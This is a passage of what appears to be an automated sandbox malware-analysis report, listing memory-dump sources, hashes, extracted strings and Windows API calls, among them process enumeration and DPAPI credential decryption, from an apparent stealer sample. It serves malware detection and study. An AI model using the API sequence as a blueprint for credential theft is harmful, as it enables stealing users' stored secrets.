                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: 0451f2ed00eededc52453de7940d837c30fc2665acd23d1823bd5895bbbf63b5
                            • Instruction ID: 9e763954fbc7826ad472cfd7acb9fd3a5eb7b455ef295f435a2a0be57e1d36da
                            • Opcode Fuzzy Hash: 0451f2ed00eededc52453de7940d837c30fc2665acd23d1823bd5895bbbf63b5
                            • Instruction Fuzzy Hash: F0012175A14208EFDB21DFA4D948BDEBBB9BF08700F104698E949E7280D770AB40DF50
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: <7\h$huzx
                            • API String ID: 0-2989614873
                            • Opcode ID: 3a52eafd0de6a069c9c871fd2ad141b81775b13073e98e93f0b8748c45c25082
                            • Instruction ID: 013c3b22e592b53178df0f51d4b228dc1782695b4c39083c97d1f8c19ca9d782
                            • Opcode Fuzzy Hash: 3a52eafd0de6a069c9c871fd2ad141b81775b13073e98e93f0b8748c45c25082
                            • Instruction Fuzzy Hash: 3163573281DBD41EC727CB3047B61517F66BA13A2231D49CECAC18F5B3C694AA1AF356
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Au|$Nx>$[GV=$\"?/
                            • API String ID: 0-852669376
                            • Opcode ID: c693663f24fe16868cf5b94703e0e1db33288a6e7d3b66da1a7224e93d7208d7
                            • Instruction ID: 0bc0b1181703cb58a100209ea332843377486b15e6044e2285143adfa95541f8
                            • Opcode Fuzzy Hash: c693663f24fe16868cf5b94703e0e1db33288a6e7d3b66da1a7224e93d7208d7
                            • Instruction Fuzzy Hash: 44B24DF360C2049FE704AE2DEC8567EB7E9EF84720F16863DEAC5C7744EA3558018696
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,00F351D4,40000001,00000000,00000000,?,00F351D4), ref: 00F49050
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: 7cb51f0e6ac5c775b457f4037da799f0d28cee6b4e10cf89baf293aad5adcf3a
                            • Instruction ID: 13e2b202b6be62146e972ef0997b400982607f47ac571216ee1d5876f89e958a
                            • Opcode Fuzzy Hash: 7cb51f0e6ac5c775b457f4037da799f0d28cee6b4e10cf89baf293aad5adcf3a
                            • Instruction Fuzzy Hash: 33110A75204204FFDF10CFA8D888FAB37A9AF89310F108548FD1A8B241D7B5E941AB60
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F34F3E,00000000,00000000), ref: 00F3A23F
                            • LocalAlloc.KERNEL32(00000040,?,?,?,00F34F3E,00000000,?), ref: 00F3A251
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F34F3E,00000000,00000000), ref: 00F3A27A
                            • LocalFree.KERNEL32(?,?,?,?,00F34F3E,00000000,?), ref: 00F3A28F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID:
                            • API String ID: 4291131564-0
                            • Opcode ID: 671bcb95c6d7f7f2c53dcade142c96e3fab6bb1f9d3cff6fe30384d9b16a0656
                            • Instruction ID: 0f8539523e01713e35e4f1b0e951afecfe54b2c4726b01b67aad5d26ce95deb1
                            • Opcode Fuzzy Hash: 671bcb95c6d7f7f2c53dcade142c96e3fab6bb1f9d3cff6fe30384d9b16a0656
                            • Instruction Fuzzy Hash: B211A474640308EFEB11CF64D895FAA77B5EB89B10F208558FD159B380C772A941CB50
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0098DD88,00000000,?,00F50DF8,00000000,?,00000000,00000000), ref: 00F47BF3
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F47BFA
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0098DD88,00000000,?,00F50DF8,00000000,?,00000000,00000000,?), ref: 00F47C0D
                            • wsprintfA.USER32 ref: 00F47C47
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: 99a8b0e32d16bd058f427a17503b5ad413d80de4e806fe40d4e853bdcb68f11f
                            • Instruction ID: 95bde1190f41d0ca797675bb01f1573f0bb597d2272183ba464c72595f6b3d83
                            • Opcode Fuzzy Hash: 99a8b0e32d16bd058f427a17503b5ad413d80de4e806fe40d4e853bdcb68f11f
                            • Instruction Fuzzy Hash: A511A1B1A05219EFEB20DB54DC49FA9BB78FB44721F1043D5FA19932C0DB746A409B51
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: eu$02:o$=9y9
                            • API String ID: 0-3468283924
                            • Opcode ID: 90babf1e58bbb866c9c64e069048558ec2a28812b29e7c1cbc0dbc82a6e14932
                            • Instruction ID: d476e6a349e5bf363a73c9028273cd227495a5ffd0140ec43c9a2f359035ff01
                            • Opcode Fuzzy Hash: 90babf1e58bbb866c9c64e069048558ec2a28812b29e7c1cbc0dbc82a6e14932
                            • Instruction Fuzzy Hash: 45B206F3A0C2149FE304AE29EC4567AFBE5EF94620F1A893DE6C4C7744E63598418793
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 9`j$uN|Z$b1
                            • API String ID: 0-1018111938
                            • Opcode ID: 0fd8676a8dd057ce65bb985b8d9fb48cc779ec455ae81e0deb960a0949f16f43
                            • Instruction ID: b3b28e483fc25ce660bd9e5e7b8a80a51a5f44086de25dcdf8db1f22d4c546f6
                            • Opcode Fuzzy Hash: 0fd8676a8dd057ce65bb985b8d9fb48cc779ec455ae81e0deb960a0949f16f43
                            • Instruction Fuzzy Hash: 97B2F7F3A0C2009FE3086E2DEC8577AB7E5EF94720F16893DE6C587744EA3558118697
                            APIs
                            • CoCreateInstance.COMBASE(00F4E120,00000000,00000001,00F4E110,00000000), ref: 00F439A8
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00F43A00
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: 0bdde3f23229ef417fa52ac29440106b36f0e3adec1e038659994c1651ac8fd0
                            • Instruction ID: 8bca185a8874a4704f309fa80a3aeb4c7df1a59f7ca5d4bda89137d9fbfcbc47
                            • Opcode Fuzzy Hash: 0bdde3f23229ef417fa52ac29440106b36f0e3adec1e038659994c1651ac8fd0
                            • Instruction Fuzzy Hash: 2741F975A40A289FDB24DB54CC95F9BB7B5BB48702F4041C8E608E72D0D775AE85CF50
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F3A2D4
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00F3A2F3
                            • LocalFree.KERNEL32(?), ref: 00F3A323
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: e793778b72026da52b98086e4028876dc2a59dc4fdd295286679185b03ef7d3f
                            • Instruction ID: 3c15155630671a72c0f4a7581c5fbde7c5f5f584b382e807d0088c9ef70f35a6
                            • Opcode Fuzzy Hash: e793778b72026da52b98086e4028876dc2a59dc4fdd295286679185b03ef7d3f
                            • Instruction Fuzzy Hash: 8911FAB4A00209EFCB05DFA4D889AAEB7B5FF88300F108559ED5597384D730AE51CFA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ?$__ZN
                            • API String ID: 0-1427190319
                            • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                            • Instruction ID: e2c49ebc3448ccff4c2de82641729db8ddb8b7a19fd7b8bd07307e640e667146
                            • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                            • Instruction Fuzzy Hash: 967214F2908B109FD714CF14C89076AB7E2BFD6720F598A1DF8A59B291D370EC41AB81
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: xn--
                            • API String ID: 0-2826155999
                            • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                            • Instruction ID: 0b10af9c1e0fd227eefa4a5b7d1e84f4095fec7e89ccce0e3b33fb9309730e8a
                            • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                            • Instruction Fuzzy Hash: 4CA236B2C002688BEF18EB54C8907FDB7B1FF45310F1842AAD556BB281D7399E85EB51
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
